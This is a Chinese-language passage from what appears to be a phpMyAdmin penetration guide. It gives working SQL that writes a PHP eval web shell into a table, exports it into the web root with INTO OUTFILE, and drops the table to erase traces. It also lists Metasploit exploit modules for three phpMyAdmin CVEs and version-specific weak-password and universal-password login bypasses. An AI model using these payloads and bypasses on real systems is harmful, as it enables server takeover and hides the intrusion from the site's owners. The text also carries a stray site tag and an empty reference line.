添加字段
字段名任意,这里为xiaoma
字段类型为TEXT
在该表中点击插入,值为一句话木马
<?php eval($_POST[pwd]); ?>'
执行SQL查询,将该表中的内容导出到指定文件
-- 假设物理路径为 "G:phpStudyWWW" select * from shell_table into outfile "G:/phpstudy/WWW/shell.php";
删除该表,抹除痕迹
Drop TABLE IF EXISTS shell_table;以上步骤也可以通过MySQL语句执行
Create TABLE shell_table (xiaoma text NOT NULL) -- 建表 Insert INTO shell_table (xiaoma) VALUES('<?php eval($_POST[1]);?>'); -- 写入 select * from shell_table into outfile 'G:/phpstudy/WWW/shell.php'; -- 导出 Drop TABLE IF EXISTS shell_table; -- 删表 特殊版本GetShellCVE-2013-3238
影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG
利用模块:exploit/multi/http/phpmyadminpregreplace
CVE-2012-5159
影响版本:phpMyAdmin v3.5.2.2
利用模块:exploit/multi/http/phpmyadmin3522_backdoor
CVE-2009-1151
PhpMyAdmin配置文件/config/config.inc.php存在命令执行
影响版本:2.11.x < 2.11.9.5 and 3.x < 3.1.3.1
利用模块:exploit/unix/webapp/phpmyadmin_config
弱口令&万能密码
弱口令:版本phpmyadmin2.11.9.2, 直接root用户登陆,无需密码
万能密码:版本2.11.3 / 2.11.4,用户名’localhost’@'@”则登录成功
参考: